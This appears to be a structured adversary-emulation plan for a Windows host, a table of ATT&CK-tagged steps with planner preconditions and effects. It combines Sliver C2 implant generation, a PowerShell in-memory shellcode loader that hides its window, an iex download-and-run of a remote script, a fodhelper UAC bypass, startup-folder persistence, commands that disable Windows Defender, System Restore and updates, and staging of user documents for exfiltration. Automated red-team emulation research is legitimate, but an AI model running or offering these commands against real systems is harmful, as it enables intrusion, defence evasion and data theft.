- Machine ID: host11
- OS: windows
- CVE: []
| uuid | name | id | source | supported_platforms | tactics | technique | description | execution | arguments | preconditions | effects |
|---|---|---|---|---|---|---|---|---|---|---|---|
| 2a602f8e-4d1f-49f1-b3b8-4b74f67cb63a | Build Shellcode for the Sliver implant (for Windows) | ['T1071.001'] | Manual | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | The command is used in the Sliver C2 (Command and Control) framework to generate a shellcode payload designed for remote access to a target machine. |
{'executor': 'Sliver Console', 'command': 'sliver > generate --mtls #{LHOST}:#{LPORT} --os windows --arch 64bit --format shellcode --save #{SAVE_PATH}\nsliver > mtls --lport #{LPORT}\n'} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the generated payload', 'type': None}} | ['(os_windows ?target - host)', '(unallocated ?p - payload)', '(unallocated ?file - file)'] | ['(sliver_implant_payload ?p - payload ?target - host)', '(shellcode_payload ?p - payload)', '(file_payload ?p - payload ?file - file)', '(bin_blob_file ?file - file)', '(file_prepared_local ?file - file)', ' |
| 7480189e-1a4b-45f5-b225-c102915f7262 | Simulate the victim download a file on its machine | ['T1566.002'] | Manual | ['windows'] | ['Initial Access'] | ['Phishing: Spearphishing Link'] | This step simulates the victim accidentally downloads a malicious file by clicking a link. | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the file on the attacker's machine\n3. Download the file to #{PATH}\n"} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} | ['(file_prepared_local ?file - file)'] | ['(file_exists ?path - path ?file - file ?t - host)'] |
| 0617285b-6005-4a73-83c5-d4dc86fcdc35 | Simulate the victim executes a shellcode payload (Windows) | ['T1059.001', 'T1620'] | Manual | ['windows'] | ['Execution', 'Defense Evasion'] | ['Command and Scripting Interpreter: PowerShell', 'Reflective Code Loading'] | None | {'executor': 'Human', 'command': '(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On victim's machine, open a powershell and execute these scripts)\n\n$s=[System.IO.File]::ReadAllBytes('#{SAVE_PATH}');\n$c='using System;using System.Runtime.InteropServices;public class W{[DllImport("kernel32")]public static extern IntPtr VirtualAlloc(IntPtr a,uint b,uint c,uint d);[DllImport("kernel32")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,IntPtr f);[DllImport("kernel32")]public static extern uint WaitForSingleObject(IntPtr a,uint b);[DllImport("kernel32.dll")]public static extern IntPtr GetConsoleWindow();[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);}';Add-Type -TypeDefinition $c;$hwnd=[W]::GetConsoleWindow();if($hwnd -ne [IntPtr]::Zero){[W]::ShowWindow($hwnd,0)};\n$p=[W]::VirtualAlloc(0,$s.Length,0x3000,0x40);\n[System.Runtime.InteropServices.Marshal]::Copy($s,0,$p,$s.Length);\n$h=[W]::CreateThread(0,0,$p,0,0,0);[W]::WaitForSingleObject($h,0xFFFFFFFF)\n'} | {'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded shellcode payload file', 'type': None}} | ['(file_exists ?path - path ?file - file ?t - host)', '(bin_blob_file ?file - file)'] | ['(file_executed ?file - file ?t - host)'] |
| 1f401bbe-de24-41d2-8e34-d026e25bfb94 | Execute a Sliver Implant Payload | ['T1071.001'] | Sliver | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | Executing a Sliver implant payload will establish a Sliver session. |
{'executor': 'None', 'command': 'None\n'} | None | ['(sliver_implant_payload ?p - payload ?t - host)', '(file_payload ?p - payload ?f - file)', '(file_executed ?f - file ?t - host)', '(unallocated ?s - executor)'] | ['(sliver_session ?s - executor ?t - host)', '~(unallocated ?s - executor)', {'operator': 'When', 'params': {'condition': '(file_executed_as_root ?f - file ?t - host)', 'effect': '(elevated_executor ?s - executor)'}}] |
| 2074d817-7819-401b-b552-1045672f77f3 | Execute Command (cmd.exe) | ['T1059.003'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: Windows Command Shell\n'] | The cmd.exe command executes a Windows command. It runs the specified command on the remote host and returns the result. This command is useful for performing various system tasks. |
{'executor': 'Sliver Executor', 'command': 'cmd(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(command_prompt ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 2d5a61f5-0447-4be4-944a-1f8530ed6574 | Remote System Discovery - arp | ['T1018'] | ART | ['windows'] | ['Discovery'] | ['Remote System Discovery'] | Identify remote systems via arp. Upon successful execution, cmd.exe will execute arp to list out the arp cache. Output will be via stdout. |
{'executor': 'Command Prompt Executor', 'command': 'arp -a\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(os_windows ?target - host)'] | ['(arp_cache_info_known ?target - host)'] |
| 7bfba376-cebc-4094-b1e6-5103b2e83c4e | Execute PowerShell Command | ['T1059.001'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: PowerShell\n'] | The powershell.exe command executes a PowerShell script or command on the remote host. This command is useful for performing system monitoring tasks or gathering information about the processes running on a remote machine. |
{'executor': 'Sliver Executor', 'command': 'powershell(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(powershell ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 1b0814d1-bb24-402d-9615-1b20c50733fb | Network Share Discovery PowerShell | ['T1135'] | ART | ['windows'] | ['Discovery'] | ['Network Share Discovery'] | Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host Upon execution, avalaible network shares will be displayed in the powershell session |
{'executor': 'Powershell Executor', 'command': 'get-smbshare\n'} | None | ['(powershell ?executor - executor ?target - host)', '(os_windows ?target - host)'] | ['(network_share_info_known ?target - host)'] |
| 5c16ceb4-ba3a-43d7-b848-a13c1f216d95 | WinPwn - PowerSharpPack - Seatbelt | ['T1082'] | ART | ['windows'] | ['Discovery'] | ['System Information Discovery'] | PowerSharpPack - Seatbelt technique via function of WinPwn. [Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. |
{'executor': 'Powershell Executor', 'command': 'iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1\')\nInvoke-Seatbelt -Command "-group=all"'} | None | ['(powershell ?executor - executor ?target - host)', '(os_windows ?target - host)'] | ['(system_time_info_known ?target - host)'] |
| 877d3366-eab3-4f43-bd24-26b37eb70266 | Remote Processes List | ['T1057'] | Sliver | ['windows', 'linux', 'macos'] | ['Discovery'] | ['Process Discovery'] | The ps command lists all running processes on a remote system. It returns a list of processes with details such as the process ID (PID) and executable name. The command includes flags for exe, overflowing terminal width, filtering based on owner/pid, printing command line arguments, skipping the first n page(s), printing process tree and setting outtime. |
{'executor': 'Sliver Executor', 'command': 'ps(#{SessionID})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | [{'operator': 'or', 'operands': ['(os_windows ?t - host)', '(os_linux ?t - host)', '(os_macos ?t - host)']}, '(sliver_session ?s - executor ?t - host)'] | ['(processes_info_known ?t - host)'] |
| bc50eb97-4a6d-4a9d-b0b2-e9cf623a9106 | Build the executable file (service) of a Sliver implant (for Windows) | ['T1071.001'] | Manual | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | The command is used in the Sliver C2 (Command and Control) framework to generate a service executable payload designed for remote access to a target machine. |
{'executor': 'Sliver Console', 'command': 'sliver > generate --mtls #{LHOST}:#{LPORT} --os windows --arch 64bit --format service --save #{SAVE_PATH}\nsliver > mtls --lport #{LPORT}\n'} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the generated payload', 'type': None}} | ['(os_windows ?target - host)', '(unallocated ?p - payload)', '(unallocated ?file - file)'] | ['(sliver_implant_payload ?p - payload ?target - host)', '(service_payload ?p - payload)', '(file_payload ?p - payload ?file - file)', '(file_prepared_local ?file - file)', '(exe_file ?file - file)', ' |
| 4a31f8db-89db-4f16-baab-47bb3f9d5b8a | Simulate the victim download and execute malicious payload file | ['T1204.002'] | Manual | ['windows', 'linux'] | ['Execution'] | ['User Execution: Malicious File'] | None | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the target payload file\n3. Download the payload file\n4. Execute the payload file to #{PATH} (If on a Linux machine, you also need to chmod the file)\n"} | {'LHOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} | ['(file_prepared_local ?file - file)', {'operator': 'or', 'operands': ['(exe_file ?file - file)', '(elf_file ?file - file)']}] | ['(file_exists ?path - path ?file - file ?t - host)', '(file_executed ?file - file ?t - host)'] |
| 8834b65a-f808-4ece-ad7e-2acdf647aafa | Change Startup Folder - HKCU Modify User Shell Folders Startup Value | ['T1547.001'] | ART | ['windows'] | ['Persistence', 'Privilege Escalation'] | ['Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'] | This test will modify the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V "Startup" value to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart |
{'executor': 'Powershell Executor', 'command': 'New-Item -ItemType Directory -path "#{new_startup_folder}"\nCopy-Item -path "#{payload}" -destination "#{new_startup_folder}"\nSet-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "#{new_startup_folder}"\n'} | {'new_startup_folder': {'description': 'new startup folder to replace standard one', 'type': 'string', 'default': '$env:TMP\atomictest\'}, 'payload': {'description': 'executable to be placed in new startup location ', 'type': 'string', 'default': 'C:\Windows\System32\calc.exe'}} | ['(os_windows ?target - host)', '(powershell ?executor - executor ?target - host)', '(file_exists ?payload - path ?file - file ?target - host)', '(exe_file ?file - file)'] | ['(file_execution_at_startup ?file - file ?target - host)'] |
| f7f31777-1bbf-4ddc-b7a1-af9f46a5299b | Obtain a persistent Sliver Executor | [None] | Manual | ['windows', 'linux', 'macos'] | ['Persistence'] | [None] | Obtain the persistency of Sliver Executor via scheduled payload file execution. |
{'executor': 'None', 'command': 'None\n'} | None | ['(sliver_implant_payload ?p - payload ?target - host)', '(file_payload ?p - payload ?f - file)', {'operator': 'or', 'operands': ['(file_execution_at_time ?f - file ?target - host)', '(file_execution_at_startup ?f - file ?target - host)']}, '(unallocated ?s - executor)'] | ['(persistent_sliver_session ?s - executor ?target - host)', '~(unallocated ?s - executor)'] |
| 2e8f1a9c-0b5e-4a7c-b6d4-9a8b2d3c5f1e | Create Directory | ['T1106'] | Sliver | ['windows', 'linux'] | ['Persistence'] | ['File System Permissions Modification'] | The mkdir command creates a new directory on the target system. |
{'executor': 'Sliver Executor', 'command': 'mkdir (#{remote_path},#{SessionID})'} | {'remote_path': {'description': 'Full path of the directory to create'}, 'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | [{'operator': 'or', 'operands': ['(os_windows ?target - host)', '(os_linux ?target - host)']}, '(sliver_session ?executorID - executor ?target - host)'] | ['(dir_exists ?path - path ?dir - dir ?target - host)'] |
| a57fbe4b-3440-452a-88a7-943531ac872a | Zip a Folder with PowerShell for Staging in Temp | ['T1074.001'] | ART | ['windows'] | ['Collection'] | ['Data Staged: Local Data Staging'] | Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip was placed in the temp directory. |
{'executor': 'Powershell Executor', 'command': 'Compress-Archive -Path "#{input_file}" -DestinationPath #{output_file} -Force\n'} | {'output_file': {'description': 'Location to save zipped file or folder', 'type': 'path', 'default': None}, 'input_file': {'description': 'Location of file or folder to zip', 'type': 'path', 'default': None}} | ['(os_windows ?target - host)', '(powershell ?executor - executor ?target - host)', '(dir_exists ?input_file - path ?dir - dir ?target - host)'] | ['(dir_data_saved ?dir - dir ?file - file)', '(file_exists ?output_file - path ?file - file ?target - host)', '(zip_file ?file - file)'] |
| e9313014-985a-48ef-80d9-cde604ffc187 | Windows Screen Capture (CopyFromScreen) | ['T1113'] | ART | ['windows'] | ['Collection'] | ['Screen Capture'] | Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API. [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen |
{'executor': 'Powershell Executor', 'command': 'Add-Type -AssemblyName System.Windows.Forms\n$screen = [Windows.Forms.SystemInformation]::VirtualScreen\n$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height\n$graphic = [Drawing.Graphics]::FromImage($bitmap)\n$graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)\n$bitmap.Save("#{output_file}")\n'} | {'output_file': {'description': 'Path where captured results will be placed', 'type': 'path', 'default': '$env:TEMP\T1113.png'}} | ['(os_windows ?target - host)', '(powershell ?executor - executor ?target - host)'] | ['(screenshot_data_saved ?file - file ?target - host)', '(file_exists ?output_file - path ?file - file ?target - host)', '(png_file ?file - file)'] |
| d3d9af44-b8ad-4375-8b0a-4bff4b7e419c | Search files of interest and save them to a single zip file (Windows) | ['T1005'] | ART | ['windows'] | ['Collection'] | ['Data from Local System'] | This test searches for files of certain extensions and saves them to a single zip file prior to extraction. |
{'executor': 'Powershell Executor', 'command': '$startingDirectory = "C:"\n$outputZip = "#{output_zip_folder_path}"\n$fileExtensionsString = ".doc, .docx, .txt" \n$fileExtensions = $fileExtensionsString -split ", "\n\nNew-Item -Type Directory $outputZip -ErrorAction Ignore -Force | Out-Null\n\nFunction Search-Files {\n param (\n [string]$directory\n )\n $files = Get-ChildItem -Path $directory -File -Recurse | Where-Object {\n $fileExtensions -contains $_.Extension.ToLower()\n }\n return $files\n}\n\n$foundFiles = Search-Files -directory $startingDirectory\nif ($foundFiles.Count -gt 0) {\n $foundFilePaths = $foundFiles.FullName\n Compress-Archive -Path $foundFilePaths -DestinationPath "$outputZip\data.zip"\n\n Write-Host "Zip file created: $outputZip\data.zip"\n } else {\n Write-Host "No files found with the specified extensions."\n }\n'} | {'output_zip_folder_path': {'description': 'Path to directory for saving the generated zip file', 'type': 'Path', 'default': 'PathToAtomicsFolder\..\ExternalPayloads\T1005'}} |
| 19301991-c518-46ca-a622-378e1be4f1ad | Simulate the victim download and execute malicious payload file as Admin (Root) | ['T1204.002'] | Manual | ['windows'] | ['Execution'] | ['User Execution: Malicious File'] | None | {'executor': 'Human', 'command': "(This step needs human interaction and (temporarily) cannot be executed automatically)\n(On attacker's machine)\npython -m http.server\n\n(On victim's machine)\n1. Open #{LHOST}:#{LPORT} in the browser\n2. Navigate to the path of the target payload file\n3. Download the payload file\n4. Execute the payload file to #{PATH} as Admin (Root)\n"} | {'HOST': {'default': None, 'description': 'IP address of the attacker machine', 'type': None}, 'LPORT': {'default': None, 'description': 'listening port of the attacter machine', 'type': None}, 'SAVE_PATH': {'default': None, 'description': 'Saved path of the downloaded payload', 'type': None}} | ['(file_prepared_local ?file - file)', '(exe_file ?file - file)', '(unallocated ?path - path)'] | ['(file_exists ?path - path ?file - file ?t - host)', '(file_executed ?file - file ?t - host)', '(file_executed_as_root ?f - file ?t - host)', '~(unallocated ?path - path)'] |
| 58f641ea-12e3-499a-b684-44dee46bd182 | Bypass UAC using Fodhelper | ['T1548.002'] | ART | ['windows'] | ['Defense Evasion', 'Privilege Escalation'] | ['Abuse Elevation Control Mechanism: Bypass User Account Control'] | Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened. |
{'executor': 'Command Prompt Executor', 'command': 'reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f\nreg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute" /f\nfodhelper.exe\n'} | {'executable_binary': {'description': 'Binary to execute with UAC Bypass', 'type': 'path', 'default': 'C:\Windows\System32\cmd.exe'}} | ['(os_windows ?target - host)', '(powershell ?executor - executor ?target - host)', '(file_exists ?executable_binary - path ?file - file ?target - host)', {'operator': 'or', 'operands': ['(exe_file ?file - file)']}] | ['(file_executed_as_root ?file - file ?target - host)'] |
| 1f401bbe-de24-41d2-8e34-d026e25bfb94 | Execute a Sliver Implant Payload | ['T1071.001'] | Sliver | ['windows'] | ['Command and Control'] | ['Application Layer Protocol - Web Protocols'] | Executing a Sliver implant payload will establish a Sliver session. |
{'executor': 'None', 'command': 'None\n'} | None | ['(sliver_implant_payload ?p - payload ?t - host)', '(file_payload ?p - payload ?f - file)', '(file_executed ?f - file ?t - host)', '(unallocated ?s - executor)'] | ['(sliver_session ?s - executor ?t - host)', '~(unallocated ?s - executor)', {'operator': 'When', 'params': {'condition': '(file_executed_as_root ?f - file ?t - host)', 'effect': '(elevated_executor ?s - executor)'}}] |
| 2074d817-7819-401b-b552-1045672f77f3 | Execute Command (cmd.exe) | ['T1059.003'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: Windows Command Shell\n'] | The cmd.exe command executes a Windows command. It runs the specified command on the remote host and returns the result. This command is useful for performing various system tasks. |
{'executor': 'Sliver Executor', 'command': 'cmd(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(command_prompt ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 01b20ca8-c7a3-4d86-af59-059f15ed5474 | Disable Windows OS Auto Update | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Disable Auto Update Windows OS feature. Redline is using this as part of its defense evasion. |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 1 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(auto_update_disabled ?target - host)'] |
| 3e757ce7-eca0-411a-9583-1c33b8508d52 | Windows HideSCANetwork Group Policy Feature | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Modify the registry of the currently logged in user using reg.exe via cmd console to remove the networking icon Group Policy. Take note that some Group Policy changes might require a restart to take effect. See how ransomware abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCANetwork /t REG_DWORD /d 1 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(networking_icon_group_policy_disabled ?target - host)'] |
| 7bfba376-cebc-4094-b1e6-5103b2e83c4e | Execute PowerShell Command | ['T1059.001'] | Sliver | ['windows'] | ['Execution'] | ['Command and Scripting Interpreter: PowerShell\n'] | The powershell.exe command executes a PowerShell script or command on the remote host. This command is useful for performing system monitoring tasks or gathering information about the processes running on a remote machine. |
{'executor': 'Sliver Executor', 'command': 'powershell(#{SessionID},#{Commands})'} | {'SessionID': {'description': 'The session ID of the active Sliver connection.'}} | ['(os_windows ?t - host)', '(sliver_session ?s1 - executor ?t - host)'] | ['(powershell ?s2 - executor ?t - host)', {'operator': 'When', 'params': {'condition': '(elevated_executor ?s1 - executor)', 'effect': '(elevated_executor ?s2 - executor)'}}] |
| 6b8df440-51ec-4d53-bf83-899591c9b5d7 | Tamper with Windows Defender ATP PowerShell | ['T1562.001'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Disable or Modify Tools'] | Attempting to disable scheduled scanning and other parts of windows defender atp. Upon execution Virus and Threat Protection will show as disabled in Windows settings. |
{'executor': 'Elevated Powershell Executor', 'command': 'Set-MpPreference -DisableRealtimeMonitoring 1\nSet-MpPreference -DisableBehaviorMonitoring 1\nSet-MpPreference -DisableScriptScanning 1\nSet-MpPreference -DisableBlockAtFirstSeen 1\n'} | None | ['(powershell ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(virus_and_threat_protection_disabled ?target - host)'] |
| 6e0d1131-2d7e-4905-8ca5-d6172f05d03d | Disable Windows Shutdown Button | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows shutdown button. See how ransomware abuses this technique- https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/ransom.msil.screenlocker.a/ |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(shutdown_button_disabled ?target - host)'] |
| 003f466a-6010-4b15-803a-cbb478a314d7 | Disable Windows Toast Notifications | ['T1112'] | ART | ['windows'] | ['Defense Evasion'] | ['Modify Registry'] | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows toast notification. See how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/ |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications /v ToastEnabled /t REG_DWORD /d 0 /f\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(toast_notification_disabled ?target - host)'] |
| 1f6743da-6ecc-4a93-b03f-dc357e4b313f | Tamper with Windows Defender Registry - Reg.exe | ['T1562.001'] | ART | ['windows'] | ['Defense Evasion'] | ['Impair Defenses: Disable or Modify Tools'] | Disable Windows Defender by tampering with windows defender registry using the utility "reg.exe" |
{'executor': 'Elevated Command Prompt Executor', 'command': 'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f >NUL 2>nul \nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\App and Browser protection" /v "DisallowExploitProtectionOverride" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\software\microsoft\windows defender\spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f >NUL 2>nul\nreg add "HKLM\Software\Microsoft\Windows Defender" /v "PUAProtection" /t REG_DWORD /d "0" /f >NUL 2>nul\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(windows_defender_disabled ?target - host)'] |
| 1c68c68d-83a4-4981-974e-8993055fa034 | Windows - Disable the SR scheduled task | ['T1490'] | ART | ['windows'] | ['Impact'] | ['Inhibit System Recovery'] | Use schtasks.exe to disable the System Restore (SR) scheduled task |
{'executor': 'Elevated Command Prompt Executor', 'command': 'schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable\n'} | None | ['(command_prompt ?executor - executor ?target - host)', '(elevated_executor ?executor - executor)', '(os_windows ?target - host)'] | ['(system_restore_disabled ?target - host)'] |